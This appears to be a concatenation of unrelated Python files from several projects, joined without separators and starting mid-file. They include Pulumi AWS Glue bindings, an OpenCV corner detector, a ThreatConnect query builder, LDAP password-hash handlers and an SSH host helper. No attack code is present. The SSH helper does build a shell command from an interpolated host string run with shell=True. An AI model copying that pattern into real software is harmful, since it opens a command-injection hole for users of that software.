return pulumi.get(self, "role") @role.setter def role(self, value: pulumi.Input[str]): pulumi.set(self, "role", value) @property @pulumi.getter(name="transformParameters") def transform_parameters(self) -> pulumi.Input['MLTransformTransformParametersArgs']: return pulumi.get(self, "transform_parameters") @transform_parameters.setter def transform_parameters(self, value: pulumi.Input['MLTransformTransformParametersArgs']): pulumi.set(self, "transform_parameters", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="glueVersion") def glue_version(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "glue_version") @glue_version.setter def glue_version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "glue_version", value) @property @pulumi.getter(name="maxCapacity") def max_capacity(self) -> Optional[pulumi.Input[float]]: return pulumi.get(self, "max_capacity") @max_capacity.setter def max_capacity(self, value: Optional[pulumi.Input[float]]): pulumi.set(self, "max_capacity", value) @property @pulumi.getter(name="maxRetries") def max_retries(self) -> 
Optional[pulumi.Input[int]]: return pulumi.get(self, "max_retries") @max_retries.setter def max_retries(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "max_retries", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="numberOfWorkers") def number_of_workers(self) -> Optional[pulumi.Input[int]]: return pulumi.get(self, "number_of_workers") @number_of_workers.setter def number_of_workers(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "number_of_workers", value) @property @pulumi.getter def tags(self) -> Optional[Any]: return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[Any]): pulumi.set(self, "tags", value) @property @pulumi.getter def timeout(self) -> Optional[pulumi.Input[int]]: return pulumi.get(self, "timeout") @timeout.setter def timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "timeout", value) @property @pulumi.getter(name="transformEncryption") def transform_encryption(self) -> Optional[pulumi.Input['MLTransformTransformEncryptionArgs']]: return pulumi.get(self, "transform_encryption") @transform_encryption.setter def transform_encryption(self, value: Optional[pulumi.Input['MLTransformTransformEncryptionArgs']]): pulumi.set(self, "transform_encryption", value) @property @pulumi.getter(name="workerType") def worker_type(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "worker_type") @worker_type.setter def worker_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "worker_type", value) warnings.warn("""MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""", DeprecationWarning) class MLTransform(pulumi.CustomResource): warnings.warn("""MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""", DeprecationWarning) @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, input_record_tables: Optional[pulumi.Input[pulumi.InputType['MLTransformInputRecordTablesArgs']]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, role: Optional[pulumi.Input[str]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformEncryptionArgs']]] = None, transform_parameters: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformParametersArgs']]] = None, worker_type: Optional[pulumi.Input[str]] = None, __props__=None): """ Resource Type definition for AWS::Glue::MLTransform :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. """ ... @overload def __init__(__self__, resource_name: str, args: MLTransformArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Resource Type definition for AWS::Glue::MLTransform :param str resource_name: The name of the resource. :param MLTransformArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. 
""" ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(MLTransformArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, input_record_tables: Optional[pulumi.Input[pulumi.InputType['MLTransformInputRecordTablesArgs']]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, role: Optional[pulumi.Input[str]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformEncryptionArgs']]] = None, transform_parameters: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformParametersArgs']]] = None, worker_type: Optional[pulumi.Input[str]] = None, __props__=None): pulumi.log.warn("""MLTransform is deprecated: MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""") if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = MLTransformArgs.__new__(MLTransformArgs) __props__.__dict__["description"] = description __props__.__dict__["glue_version"] = glue_version if input_record_tables is None and not opts.urn: raise TypeError("Missing required property 'input_record_tables'") __props__.__dict__["input_record_tables"] = input_record_tables __props__.__dict__["max_capacity"] = max_capacity __props__.__dict__["max_retries"] = max_retries __props__.__dict__["name"] = name __props__.__dict__["number_of_workers"] = number_of_workers if role is None and not opts.urn: raise TypeError("Missing required property 'role'") __props__.__dict__["role"] = role __props__.__dict__["tags"] = tags __props__.__dict__["timeout"] = timeout __props__.__dict__["transform_encryption"] = transform_encryption if transform_parameters is None and not opts.urn: raise TypeError("Missing required property 'transform_parameters'") __props__.__dict__["transform_parameters"] = transform_parameters __props__.__dict__["worker_type"] = worker_type super(MLTransform, __self__).__init__( 'aws-native:glue:MLTransform', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'MLTransform': """ Get an existing MLTransform resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. 
""" opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = MLTransformArgs.__new__(MLTransformArgs) __props__.__dict__["description"] = None __props__.__dict__["glue_version"] = None __props__.__dict__["input_record_tables"] = None __props__.__dict__["max_capacity"] = None __props__.__dict__["max_retries"] = None __props__.__dict__["name"] = None __props__.__dict__["number_of_workers"] = None __props__.__dict__["role"] = None __props__.__dict__["tags"] = None __props__.__dict__["timeout"] = None __props__.__dict__["transform_encryption"] = None __props__.__dict__["transform_parameters"] = None __props__.__dict__["worker_type"] = None return MLTransform(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "description") @property @pulumi.getter(name="glueVersion") def glue_version(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "glue_version") @property @pulumi.getter(name="inputRecordTables") def input_record_tables(self) -> pulumi.Output['outputs.MLTransformInputRecordTables']: return pulumi.get(self, "input_record_tables") @property @pulumi.getter(name="maxCapacity") def max_capacity(self) -> pulumi.Output[Optional[float]]: return pulumi.get(self, "max_capacity") @property @pulumi.getter(name="maxRetries") def max_retries(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "max_retries") @property @pulumi.getter def name(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "name") @property @pulumi.getter(name="numberOfWorkers") def number_of_workers(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "number_of_workers") @property @pulumi.getter def role(self) -> pulumi.Output[str]: return pulumi.get(self, "role") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Any]]: return pulumi.get(self, "tags") @property @pulumi.getter def timeout(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "timeout") @property @pulumi.getter(name="transformEncryption") def transform_encryption(self) -> pulumi.Output[Optional['outputs.MLTransformTransformEncryption']]: return pulumi.get(self, "transform_encryption") @property @pulumi.getter(name="transformParameters") def transform_parameters(self) -> pulumi.Output['outputs.MLTransformTransformParameters']: return pulumi.get(self, "transform_parameters") @property @pulumi.getter(name="workerType") def worker_type(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "worker_type") src/biolookup/db/cli.py # -*- coding: utf-8 -*- """CLI for the Biolookup Service database loader. Run with ``biolookup load``. 
""" import click from more_click import verbose_option from pyobo.resource_utils import ensure_alts, ensure_definitions, ensure_ooh_na_na from ..constants import ALTS_TABLE_NAME, DEFS_TABLE_NAME, REFS_TABLE_NAME, get_sqlalchemy_uri __all__ = [ "load", ] @click.command() @click.option("--uri", default=get_sqlalchemy_uri, help="The database URL.", show_default=True) @click.option("--refs-table", default=REFS_TABLE_NAME, show_default=True) @click.option( "--refs-path", default=ensure_ooh_na_na, show_default=True, help="By default, load from Zenodo" ) @click.option("--alts-table", default=ALTS_TABLE_NAME, show_default=True) @click.option( "--alts-path", default=ensure_alts, show_default=True, help="By default, load from Zenodo" ) @click.option("--defs-table", default=DEFS_TABLE_NAME, show_default=True) @click.option( "--defs-path", default=ensure_definitions, show_default=True, help="By default, load from Zenodo", ) @click.option("--test", is_flag=True, help="Test run with a small test subset") @verbose_option def load( uri: str, refs_table: str, refs_path: str, alts_table: str, alts_path: str, defs_table: str, defs_path: str, test: bool, ): """Load the SQL database.""" from .loader import load as _load _load( uri=uri, refs_table=refs_table, refs_path=refs_path, alts_table=alts_table, alts_path=alts_path, defs_table=defs_table, defs_path=defs_path, test=test, ) if __name__ == "__main__": load() 1-10 #! /usr/bin/python import rospy import cv2 # OpenCV from cv_bridge import CvBridge, CvBridgeError from std_msgs.msg import String from sensor_msgs.msg import Image import numpy as np import math as m from enum import Enum import sys x_cam_width = 640 y_cam_height = 480 # Line with form ax + by + c = 0 class Line: def __init__(self, a, b, c): self.a = a self.b = b self.c = c def get_line(x1, y1, x2, y2): if x1 == x2 and y1 == y2: raise ValueError("Points coincide") return None else: if x1 == x2: return Line(1, 0, -x1) else: m = (y2 - y1) / (x2 - x1) return Line(-m, 1, (m * x1 - y1)) def get_intersection_pt(l1, l2): if l1.a * l2.b == l2.a * l1.b: try: raise ValueError("Lines have the same slope") # Clean this up whenever, learning how to raise exceptions except ValueError as e: print("Value Error: %s" % (e)) return None # x, y = solution to the simultaneous linear equations # (l1.a * x + l1.b * y = -l1.c) and # (l2.a * x + l2.b * y = -l2.c) a = np.array(((l1.a, l1.b), (l2.a, l2.b))) b = np.array((-l1.c, -l2.c)) x, y = np.linalg.solve(a, b) return (x, y) def find_corners(img): # Convert img to grayscale and do Canny edge det. 
on img to get Hough lines gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) edges = cv2.Canny(gray, 50, 200, 3) lines = cv2.HoughLines(edges, 1, np.pi / 180, 220) # Draw and create equations of lines if at least 4 lines (corner detected) line_eqns = [] try: if len(lines) >= 4: for line in lines: rho = line[0][0] theta = line[0][1] a = np.cos(theta) b = np.sin(theta) x0 = a * rho y0 = b * rho x1 = int(x0 + 1000 * (-b)) y1 = int(y0 + 1000 * (a)) x2 = int(x0 - 1000 * (-b)) y2 = int(y0 - 1000 * (a)) cv2.line(img, (x1, y1), (x2, y2), (0, 255, 0), 2) line_eqns.append(get_line(x1, y1, x2, y2)) except TypeError: print("No lines found above set threshold") return None # Get all intersection points of lines (exclude points off of screen or lines that are parallel) intersec_pts = [] for i in range(len(line_eqns)): for j in range(i + 1, len(line_eqns)): pt = get_intersection_pt(line_eqns[i], line_eqns[j]) if pt != None and pt[0] <= x_cam_width and pt[1] <= y_cam_height: intersec_pts.append(pt) # Decide which intersection point is the corner (right now just getting middle of points) x_sum = 0 y_sum = 0 for pt in intersec_pts: x_sum += pt[0] y_sum += pt[1] corner_pt = (int(x_sum / len(intersec_pts)), int(y_sum / len(intersec_pts))) return corner_pt if __name__ == "__main__": filename = str(sys.argv[1]) if len(sys.argv) > 1 else "building.jpg" img = cv2.imread(filename, 1) corner_pt = find_corners(img) print("Intersection Point:", corner_pt) cv2.imshow("Image", img) cv2.waitKey(0) ### Test these helpers more if problems ensue # l1 = get_line(1,3,1,5) # l2 = get_line(0,4,3,4) # print(get_intersection_pt(l1,l2)) 10-100 """ThreatConnect TQL""" # standard library from enum import Enum from .filter import Filter class TQL: """ThreatConnect TQL""" class Operator(Enum): """Available TQL Operators""" EQ = '=' NE = '!=' GT = '>' LT = '<' LEQ = '<=' GEQ = '>=' NOT_IN = 'NOT IN' IN = 'IN' NOT_LIKE = 'NOT LIKE' LIKE = 'LIKE' NOT_CONTAINS = 'NOT CONTAINS' CONTAINS = 'CONTAINS' NOT_STARTS_WITH = 'NOT STARTSWITH' STARTS_WITH = 'STARTSWITH' NOT_ENDS_WITH = 'NOT ENDSWITH' ENDS_WITH = 'ENDSWITH' class Type(Enum): """Enum representing available value types""" STRING = 'String' INTEGER = 'Integer' BOOLEAN = 'Boolean' SUB_QUERY = 'Sub Query' def __init__(self): """Initialize Class Properties""" self._filters = [] self.raw_tql = None @property def as_str(self): """Convert the TQL obj to a string""" filters = [] for tql_filter in self.filters: value = tql_filter.get('value') # keyword = tql_filter.get('keyword') if isinstance(value, Filter): filters.append(f"{tql_filter.get('keyword')}({value._tql.as_str})") # elif keyword.startswith('has'): # values = value # if not isinstance(value, list): # values = [value] # if tql_filter.get('type') == self.Type.STRING: # values = [f'"{value}"' for value in values] # # value = f"({','.join(values)})" # value = f"({','.join([str(v) for v in values])})" # if tql_filter.get('type') == self.Type.STRING: # value = f'"{value}"' # filters.append( # f"{tql_filter.get('keyword')} {tql_filter.get('operator').name} {value}" # ) else: if tql_filter.get('type') == self.Type.STRING: value = f'"{value}"' filters.append( f"{tql_filter.get('keyword')} {tql_filter.get('operator').name} {value}" ) return ' and '.join(filters) @property def filters(self): """Return the filters""" return self._filters @filters.setter def filters(self, filters): """Set the filters""" self._filters = filters def add_filter(self, keyword, operator, value, type_=Type.STRING): """Add a filter to the current obj Args: keyword (str): the 
field to search on operator (str): the operator to use value (str): the value to compare type_ (Type): How to treat the value (defaults to String) """ self.filters.append( {'keyword': keyword, 'operator': operator, 'value': value, 'type': type_} ) def set_raw_tql(self, tql): """Set a raw TQL filter""" self.raw_tql = tql """ Implement numerical minmax scaler. """ from typing import Any, Union import dask.dataframe as dd class MinmaxScaler: """Min Value and Max Value Scaler for scaling numerical values Attributes: name Name of scaler min Min value of provided data column max Max value of provided data column """ def __init__(self) -> None: """ This function initiate numerical scaler. """ self.name = "minmaxScaler" self.min = 0 self.max = 0 def fit(self, col_df: dd.Series) -> Any: """ Extract min value and max value for Minmax Scaler according to the provided column. Parameters ---------- col_df Provided data column. """ self.min = col_df.min() self.max = col_df.max() return self def transform(self, col_df: dd.Series) -> dd.Series: """ Transform the provided data column with the extracted min value and max value. Parameters ---------- col_df Provided data column. """ result = col_df.map(self.compute_val) return result def fit_transform(self, col_df: dd.Series) -> dd.Series: """ " Extract min value and max value for Minmax Scaler according to the provided column. Transform the provided data column with the extracted min value and max value. Parameters ---------- col_df Data column. """ return self.fit(col_df).transform(col_df) def compute_val(self, val: Union[int, float]) -> Union[int, float]: """ Compute scaling value of provided value with fitted min value and max value. Parameters ---------- val Value should be scaled. """ return (val - self.min) / (self.max - self.min) from config import SSH_USER, SSH_KEYFILE, REMOTE_SERVER from ssh import ssh_exec import subprocess def serial2hostname(serialnumber : str, tld : str = 'local') -> str: return f'{serialnumber}.{tld}' def hostname2serial(hostname : str) -> str: return hostname.split('.')[0] def serial2port(serialnumber : str, port_offset : int = 65000) -> int: return int(serialnumber.split('-')[1]) + port_offset def get_hostname_getent(remote_host : str, verbose=False): output = subprocess.Popen(f'getent hosts {remote_host}', shell=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0] if output: if verbose: print(f'getent returned {output}') ip, hostname = " ".join(output.decode('utf-8').rstrip().split(' ')).split() return hostname.lower() else: if verbose: print(f'failed to resolve {remote_host}') return None def get_hostname_ssh(ssh_remote_host : str, verbose : bool = False) -> str: if hostname := ssh_exec(ssh_remote_host, cmd = 'hostname', verbose = verbose): if verbose: print(f'retrieved hostname {hostname.rstrip()}') return hostname.rstrip().lower() else: if verbose: print('failed to get hostname') return None def assemble_hosts_local(serialnumber : str, verbose=False) -> iter: remote_host = serial2hostname(serialnumber) if verbose: print(f'trying host: {remote_host}') hostname = get_hostname_getent(remote_host, verbose=verbose) if verbose: print(f'get_hostname_getent returned {hostname}') if hostname and hostname.split(".")[0] == serialnumber: if verbose: print(f'hostname and serialnumber match! 
{serialnumber} == {hostname}') return (serialnumber, f"{SSH_USER}@{remote_host} -i {SSH_KEYFILE}") else: return None def assemble_hosts_remote(serialnumber : str, verbose : bool = False) -> iter: ssh_remote_host = f'{SSH_USER}@{REMOTE_SERVER} -p {serial2port(serialnumber)} -i {SSH_KEYFILE}' if verbose: print(f'assembled ssh remote host: {ssh_remote_host}') hostname = get_hostname_ssh(ssh_remote_host, verbose = verbose) if hostname == serialnumber: if verbose: print(f'hostname and serialnumber match! {serialnumber} == {hostname}') return (hostname, ssh_remote_host) else: return None def assemble_hosts(serialnumbers : list, remote : bool = False, verbose : bool = False) -> iter: """ assemble_hosts(serialnumbers : list, remote : bool = False, verbose : bool = False) -> iter Parameters: serialnumbers (list): A list containing serialnumbers of motion sensor from which data is to be retrieved remote (bool): flag to be used if data is to be retrieved via reverse ssh tunnels verbose (bool): flag to display debugging information Returns: Returns an iterator of tuples containing the serialnumber (str) and an ssh access string, that can be used to fetch data or execute remote bash commands """ for serialnumber in serialnumbers: serialnumber = serialnumber.lower() if verbose: print(f'processing serialnumber: {serialnumber}') if remote: if host_access := assemble_hosts_remote(serialnumber, verbose=verbose): yield host_access else: if host_access := assemble_hosts_local(serialnumber, verbose=verbose): yield host_access core/RosettaStone.py import os class RosettaStone(object): """ Class imodeling our network representation """ def __init__(self, *args, **kwargs): self.importers = self.list_importers() self.exporters = self.list_exporters() def load_list(self, module): """ Loads a list of files ended with *.py format in a given module :param module: string with the relative module name """ list_obj = (d for d in os.listdir(module) if d.endswith('.py')) return list(list_obj) def list_importers(self): """ Loads the list of files inside 'modules/importers' """ return self.load_list('modules/importers') def list_exporters(self): """ Loads the list of files inside 'modules/exporters' """ return self.load_list('modules/exporters') def check_parser_type(self, list_types, parser_type): """ Check if a substring is in a strings list. :param list_types: a strings list :param parser_type: the substring to find :return: Raises an Exception in case substring is not found """ if not any(parser_type in s for s in list_types): raise Exception('The parser type is not available: %s' % parser_type) def import_module(self, module, klass): """ Imports a class given a modules and the class name Is assumed that the package and class names are the same. :param module: string with the module name :param klass: string with the class name :return: the class instance """ mod = __import__(module + '.' 
+ klass, fromlist=[klass]) return getattr(mod, klass)() def convert(self, input_file, output_file, input_format, output_format): """ Function that converts from one framework to a another :param input_file: path to the model file to be exported :param output_file: path to the exported model file :param input_format: type of the model to be exported :param output_format: type of the exported model :return: None """ # check if parser exists self.check_parser_type(self.importers, input_format) self.check_parser_type(self.exporters, output_format) # instantiate importer and exporter importer = self.import_module('modules.importers', input_format) exporter = self.import_module('modules.exporters', output_format) # load and save # exporter.save(importer.load(input_file), output_file) ProjectsStartUp/ru-dalle # -*- coding: utf-8 -*- import pytest @pytest.mark.parametrize('text, text_seq_length, bpe_dropout', [ ('hello, how are you?', 128, 0.1), ('hello, how are you?', 128, 0.5), ('hello, how are you?', 128, 1.0), ('hello ... how are you ?', 256, 1.0), ('a person standing at a table with bottles of win', 64, 0.5), ('привет как дела???', 76, 0.0), ('клип на русском языке :)', 76, 0.1), ]) def test_encode_decode_text_yttm(yttm_tokenizer, text, text_seq_length, bpe_dropout): tokens = yttm_tokenizer.encode_text(text, text_seq_length=text_seq_length, bpe_dropout=bpe_dropout) decoded_text = yttm_tokenizer.decode_text(tokens) assert text == decoded_text from __future__ import print_function from pgpy.ck_plane import check_cross_law, check_cross_TQF, ellck, hyck from pgpy.proj_plane import pg_point, plucker, tri_dual def chk_tri_ell_hy(myck): """[summary] Arguments: myck (type): [description] K (type): [description] Raises: NotImplementedError -- [description] NotImplementedError -- [description] """ a1 = pg_point([33, 121, 54]) a2 = pg_point([33, 564, 34]) a3 = pg_point([34, 64, -62]) temp = myck.perp(a1) triangle = [a1, a2, a3] trilateral = tri_dual(triangle) l1, _, _ = trilateral Q = myck.tri_quadrance(triangle) S = myck.tri_spread(trilateral) a4 = plucker(2, a1, 3, a2) collin = [a1, a2, a4] Q2 = myck.tri_quadrance(collin) assert myck.perp(temp) == a1 assert myck.perp(myck.perp(l1)) == l1 assert myck.quadrance(a1, a1) == 0 assert myck.spread(l1, l1) == 0 assert check_cross_law(S, Q[2]) == 0 assert check_cross_law(Q, S[2]) == 0 assert check_cross_TQF(Q2) == 0 def test_ell_hy(): chk_tri_ell_hy(ellck()) chk_tri_ell_hy(hyck()) chk_tri_ell_hy(ellck()) chk_tri_ell_hy(hyck()) # def no_test_symbolic(myck): # import sympy # sympy.init_printing() # pv = sympy.symbols("p:3", integer=True) # qv = sympy.symbols("q:3", integer=True) # a1 = pg_point(pv) # a2 = pg_point(qv) # lambda1, mu1 = sympy.symbols("lambda1 mu1", integer=True) # a3 = plucker(lambda1, a1, mu1, a2) # q1 = myck.quadrance(a2, a3) # q2 = myck.quadrance(a1, a3) # q3 = myck.quadrance(a1, a2) # tqf = (q1 + q2 + q3)**2 - 2*(q1*q1 + q2*q2 + q3*q3) - 4*q1*q2*q3 # tqf = sympy.simplify(tqf) # assert tqf == 0 # sv = sympy.symbols("s:3", integer=True) # a3 = pg_point(sv) # l1 = join(a2, a3) # l2 = join(a1, a3) # l3 = join(a1, a2) # t1 = myck.altitude(a1, l1) # t2 = myck.altitude(a2, l2) # t3 = myck.altitude(a3, l3) # o = t1*t2 # ans = t3.dot(o) # ans = sympy.simplify(ans) # assert ans == 0 10-100 # -*- coding: utf-8 -*- import llbc class pyllbcStrUtil(object): """ pyllbc string util class encapcsulation. 
""" __native_hash_meth = llbc.inl.HashString @classmethod def hash_string(cls, s): """ hash string value """ return cls.__native_hash_meth(s) llbc.StrUtil = pyllbcStrUtil from .currying import currying from .tailrecurve import tail_recurse_optimizer from .infix import infix, is_a, to, step, has, take, drop __all__ = [ 'currying', 'tail_recurse_optimizer', 'infix', 'is_a', 'to', 'step', 'has', 'take', 'drop' ]from chainmodel.models.steem.operation import Operation class ProducerReward(Operation): asset_fields = ['vesting_shares'] tx_involves = ['producer'] Symmetry-International/m2cgen import pytest from tests.utils import tmp_dir def pytest_addoption(parser): parser.addoption( "--fast", action="store_const", default=False, const=True, help="Run e2e tests fast" ) @pytest.fixture def is_fast(request): return request.config.getoption("--fast") @pytest.fixture(scope="module") def global_tmp_dir(): with tmp_dir() as directory: yield directory from base64 import b64encode, b64decode from hashlib import md5, sha1 import logging log = logging.getLogger(__name__) import re from otp.ai.passlib.handlers.misc import plaintext from otp.ai.passlib.utils import unix_crypt_schemes, to_unicode from otp.ai.passlib.utils.compat import uascii_to_str, unicode, u from otp.ai.passlib.utils.decor import classproperty import otp.ai.passlib.utils.handlers as uh __all__ = [ 'ldap_plaintext', 'ldap_md5', 'ldap_sha1', 'ldap_salted_md5', 'ldap_salted_sha1', 'ldap_des_crypt', 'ldap_bsdi_crypt', 'ldap_md5_crypt', 'ldap_sha1_cryptldap_bcrypt', 'ldap_sha256_crypt', 'ldap_sha512_crypt'] class _Base64DigestHelper(uh.StaticHandler): ident = None _hash_func = None _hash_regex = None checksum_chars = uh.PADDED_BASE64_CHARS @classproperty def _hash_prefix(cls): return cls.ident def _calc_checksum(self, secret): if isinstance(secret, unicode): secret = secret.encode('utf-8') chk = self._hash_func(secret).digest() return b64encode(chk).decode('ascii') class _SaltedBase64DigestHelper(uh.HasRawSalt, uh.HasRawChecksum, uh.GenericHandler): setting_kwds = ('salt', 'salt_size') checksum_chars = uh.PADDED_BASE64_CHARS ident = None _hash_func = None _hash_regex = None min_salt_size = max_salt_size = 4 min_salt_size = 4 default_salt_size = 4 max_salt_size = 16 @classmethod def from_string(cls, hash): hash = to_unicode(hash, 'ascii', 'hash') m = cls._hash_regex.match(hash) if not m: raise uh.exc.InvalidHashError(cls) try: data = b64decode(m.group('tmp').encode('ascii')) except TypeError: raise uh.exc.MalformedHashError(cls) cs = cls.checksum_size return cls(checksum=data[:cs], salt=data[cs:]) def to_string(self): data = self.checksum + self.salt hash = self.ident + b64encode(data).decode('ascii') return uascii_to_str(hash) def _calc_checksum(self, secret): if isinstance(secret, unicode): secret = secret.encode('utf-8') return self._hash_func(secret + self.salt).digest() class ldap_md5(_Base64DigestHelper): name = 'ldap_md5' ident = u('{MD5}') _hash_func = md5 _hash_regex = re.compile(u('^\\{MD5\\}(?P[+/a-zA-Z0-9]{22}==)$')) class ldap_sha1(_Base64DigestHelper): name = 'ldap_sha1' ident = u('{SHA}') _hash_func = sha1 _hash_regex = re.compile(u('^\\{SHA\\}(?P[+/a-zA-Z0-9]{27}=)$')) class ldap_salted_md5(_SaltedBase64DigestHelper): name = 'ldap_salted_md5' ident = u('{SMD5}') checksum_size = 16 _hash_func = md5 _hash_regex = re.compile(u('^\\{SMD5\\}(?P[+/a-zA-Z0-9]{27,}={0,2})$')) class ldap_salted_sha1(_SaltedBase64DigestHelper): name = 'ldap_salted_sha1' ident = u('{SSHA}') checksum_size = 20 _hash_func = sha1 _hash_regex = 
re.compile(u('^\\{SSHA\\}(?P<tmp>[+/a-zA-Z0-9]{32,}={0,2})$')) class ldap_plaintext(plaintext): name = 'ldap_plaintext' _2307_pat = re.compile(u('^\\{\\w+\\}.*$')) @uh.deprecated_method(deprecated='1.7', removed='2.0') @classmethod def genconfig(cls): return '!' @classmethod def identify(cls, hash): hash = uh.to_unicode_for_identify(hash) return bool(hash) and cls._2307_pat.match(hash) is None ldap_crypt_schemes = [ 'ldap_' + name for name in unix_crypt_schemes ] def _init_ldap_crypt_handlers(): g = globals() for wname in unix_crypt_schemes: name = 'ldap_' + wname g[name] = uh.PrefixWrapper(name, wname, prefix=u('{CRYPT}'), lazy=True) del g _init_ldap_crypt_handlers()import sys sys.setrecursionlimit(500005) si = sys.stdin.readline n, Q = map(int, si().split()) def pro(): # It is easiest to start from the plot you want to buy and walk up to the root plot while looking for the answer, # because the parent node is easy to find. estate = [False] * (n + 1) for _ in range(Q): x = int(si()) y = x res = 0 while x: if estate[x]: res = x x //= 2 estate[y] = True print(res) if __name__ == "__main__": pro() z_src/utils/voc_utils.py import torch.nn.functional as F from torch import nn from PIL import Image from z_src.utils import config as cfg import torch import torch.optim as optim import numpy as np class CrossEntropyLoss2d(nn.Module): def __init__(self, weight=None, size_average=None, ignore_index=255, reduce=None, reduction='mean'): super(CrossEntropyLoss2d, self).__init__() self.ignore_index = ignore_index self.nll_loss = nn.NLLLoss(weight, size_average, ignore_index) def forward(self, inputs, targets): np.set_printoptions(threshold=np.inf) return self.nll_loss(F.log_softmax(inputs, dim=0), targets) def create_loss_and_optimizer(net, learning_rate=0.001): # Loss function # loss = CrossEntropyLoss2d() loss = torch.nn.CrossEntropyLoss(ignore_index=255) # loss = torch.nn.BCEWithLogitsLoss() # optimizer = optim.Adam(net.parameters(), lr=learning_rate) optimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=0.9) return loss, optimizer def colorize_mask(mask): # 0=background, 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle # 6=bus, 7=car, 8=cat, 9=chair, 10=cow, # 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person # 16=potted plant, 17=sheep, 18=sofa, 19=train, # 20=tv/monitor # mask: numpy array of the mask palette = get_palette(cfg.NUMBER_OF_CLASSES) # new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P') output_im = Image.fromarray(mask) output_im.putpalette(palette) return output_im def colorize_image(output_im): palette = get_palette(cfg.NUMBER_OF_CLASSES) output_im.putpalette(palette) return output_im def get_palette(num_cls): """ Returns the color map for visualizing the segmentation mask. 
Args: num_cls: Number of classes Returns: The color map """ n = num_cls palette = [0] * (n * 3) for j in range(0, n): lab = j palette[j * 3 + 0] = 0 palette[j * 3 + 1] = 0 palette[j * 3 + 2] = 0 i = 0 while lab: palette[j * 3 + 0] |= (((lab >> 0) & 1) << (7 - i)) palette[j * 3 + 1] |= (((lab >> 1) & 1) << (7 - i)) palette[j * 3 + 2] |= (((lab >> 2) & 1) << (7 - i)) i += 1 lab >>= 3 return palette src/concurrency in python/python concurrecy/22.thread_locks_as_contextManagers.py import logging import threading import time logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s', ) def worker_with(lock): with lock: logging.debug("lock acquired") def worker_nowith_lock(lock): lock.acquire() try: logging.debug("lock acquired directly") finally: lock.release() logging.debug("lock released") lock = threading.Lock() w = threading.Thread(target=worker_with, args=(lock,)) nw = threading.Thread(target=worker_nowith_lock, args=(lock,)) w.start() nw.start() fbsamples/cp_reference # Copyright 2004-present, Facebook. All Rights Reserved. from django.db import models from core.models import BaseModel class Customer(BaseModel): """Represent a single customer instance fields: store: the store this customer belongs to full_name: customer full name email: customer email addr: 